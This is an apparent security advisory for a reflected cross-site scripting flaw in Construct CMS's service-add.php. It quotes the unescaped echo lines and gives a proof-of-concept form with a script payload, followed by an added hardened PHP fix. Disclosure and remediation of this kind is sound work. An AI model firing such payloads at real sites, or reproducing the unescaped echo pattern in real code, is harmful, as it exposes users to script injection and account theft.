Construct CMS - Cross-Site Scripting

2018.07.08
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

Title : Construct CMS - Cross-Site Scripting
Author : Abolfazl Hajizade
Category : Webapps
Tested on : Windows-linux
Google Dork : N/A

Vulnerable page:
/construct/upload/cms/admin/service-add.php

Vulnerable Source:
line 133: "<?php if(isset($_POST['name'])){echo $_POST['name'];} ?>"
line 139: "<?php if(isset($_POST['slug'])){echo $_POST['slug'];} ?>"

POC:
<html>
<body>
<form action="http://localhost/construct/upload/cms/admin/service-add.php" method="post">
<input type="text" name="name" value="<script>alert('ultrasec')</script>"/>
<input type="submit" value="exploit"/>
</form>
</body>
</html>

================================
WebSite : UltraSec.Org
Channel : @UltraSecurity
Email : zeroday1010@gmail.com
Special Thanks : ashkan moghaddas , MrQadir , Milad Ranjbar
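Added example (not part of the advisory and not Construct CMS code): a hardened form of the two echo statements quoted at lines 133 and 139, which write $_POST['name'] and $_POST['slug'] back into the page unescaped. The helper name e_post() and the surrounding <input> markup are assumptions, since the advisory shows only the echo statements and not their HTML context.

```php
<?php
// Added example. e_post() is a hypothetical helper name; the <input> markup
// below is an assumed context for the echoed values.

/**
 * Return a POST field escaped for HTML text or a quoted attribute value.
 * Non-string input (e.g. a request sending name[]=x) is treated as empty
 * instead of being echoed as "Array" with a conversion warning.
 */
function e_post(string $key, array $post): string
{
    $value = $post[$key] ?? '';
    if (!is_string($value)) {
        return '';
    }
    // ENT_QUOTES escapes both ' and ", so the value cannot close a quoted
    // attribute. ENT_SUBSTITUTE replaces invalid UTF-8 sequences instead of
    // making htmlspecialchars() return an empty string.
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Constructed sample input: the PoC's "name" value plus a non-string "slug".
// In the real page this would be $_POST.
$post = [
    'name' => "<script>alert('ultrasec')</script>",
    'slug' => ['unexpected', 'array'],
];

// Before (as quoted in the advisory): echo $_POST['name'];
// After: every reflected field goes through the escaping helper.
$name = e_post('name', $post);
$slug = e_post('slug', $post);

echo '<input type="text" name="name" value="' . $name . '">' . "\n";
echo '<input type="text" name="slug" value="' . $slug . '">' . "\n";
```

Always quote the attribute in the template: htmlspecialchars() does not escape spaces, so an unquoted value="" context would still allow new attributes to be injected.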



Copyright 2018, cxsecurity.com

 
